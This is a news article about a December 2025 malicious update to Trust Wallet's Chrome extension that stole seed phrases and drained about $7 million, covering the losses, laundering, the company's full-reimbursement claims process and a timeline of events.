Trust Wallet is rolling out a full compensation program for users hit by a holiday-season Chrome extension hack that drained roughly $7 million in crypto. The Binance-backed company is promising 100% reimbursement for verified victims as scrutiny intensifies over browser-based wallet security.
The breach was highly targeted. Only users who interacted with Chrome extension version 2.68 between December 24 and December 26, 2025 were vulnerable. Trust Wallet’s mobile apps and non-Chrome browser users were unaffected.
But the fallout is significant: blockchain forensics show that attackers looted millions across Bitcoin, Ethereum, and Solana, moving more than $4 million through exchanges in rapid laundering cycles.
What Went Wrong
According to Trust Wallet, attackers used a leaked Chrome Web Store API key to upload a malicious update (v2.68) on December 24. The tainted build injected seed-phrase-stealing code via a modified analytics library, effectively intercepting users’ recovery phrases the moment they logged in.
By Christmas Day, reports of drained wallets reached on-chain analyst ZachXBT, who flagged the issue on Telegram. Trust Wallet scrambled to push a clean update (v2.69) on December 25 and told users to disable the compromised version immediately.
Security firms SlowMist and PeckShield say attackers may have prepared weeks earlier, citing a rogue domain registered on December 8. SlowMist labeled the breach “APT-level”—suggesting an unusually sophisticated actor or possible insider access. Even Binance co-founder Changpeng Zhao (CZ) speculated it was “most likely” an inside job, though investigations continue.
The Damage
PeckShield estimates the stolen funds span:
- Bitcoin: ~$3M
- Ethereum & L2 tokens: $3M+
- Solana: ~$431K
Of the ~$7M total, more than $4.25M has already been laundered through ChangeNOW, HTX, FixedFloat, KuCoin, and other exchanges. Roughly $2.8M remains in attacker-controlled wallets.
This incident adds to more than $713M in wallet-related losses recorded in 2025, underscoring the growing security gaps in self-custody tools.
How Affected Users Can Claim Compensation
Trust Wallet has opened an official claims portal at:
trustwallet-support.freshdesk.com/support/tickets/new
Victims must provide:
- Email & country (for possible legal proceedings)
- Compromised wallet addresses
- Attacker wallet addresses
- Transaction hashes
- Estimated loss amount
- A fresh wallet address for reimbursement
The company says each case will undergo manual verification to prevent fraudulent claims and warns users to avoid impostor sites requesting seed phrases or passwords.
Trust Wallet’s Response, and CZ’s Assurance
Trust Wallet CEO Eowyn Chen acknowledged that the malicious upload bypassed internal safeguards and said the team is now implementing:
- Outside security audits
- Stricter internal access controls
- Quarterly third-party reviews
CZ reiterated that affected users’ funds are “SAFU,” referencing Binance’s history of covering over $1 billion in user losses during major incidents.
No exact payout timeline has been given, but Trust Wallet says its team is verifying claims “around the clock.”
Are Browser Wallets Too Risky?
The hack has reignited debate across X and Telegram about whether browser extensions—even from major brands, are fundamentally unsafe.
“Browser extensions are hack magnets,” one researcher wrote, calling for increased adoption of hardware wallets and multisig setups for high-value storage.
For others, Trust Wallet’s rapid reimbursement is a welcome precedent. But the broader takeaway is sobering: as crypto adoption accelerates, attackers are shifting from protocol exploits to software supply-chain attacks, often easier to execute and harder to detect.
Timeline of This Events
- Dec 8, 2025: Rogue exfiltration domain registered.
- Dec 24, 12:32 p.m. UTC: Malicious v2.68 pushed to Chrome Web Store via leaked API key.
- Dec 25: Community reports; v2.69 safe version released.
- Dec 26, 11 a.m. UTC: Exposure window ends.
- Dec 26 (later): Forensics reveal >$4M laundered.
- Dec 27: Trust Wallet launches compensation program; CZ confirms full coverage.
Here is What We Should Know
Trust Wallet’s reimbursement move may soften the blow, but the breach adds fuel to longstanding concerns over extension-based wallets. As 2026 approaches, wallet security, especially around supply-chain vulnerabilities, will likely define the next wave of crypto infrastructure debates.
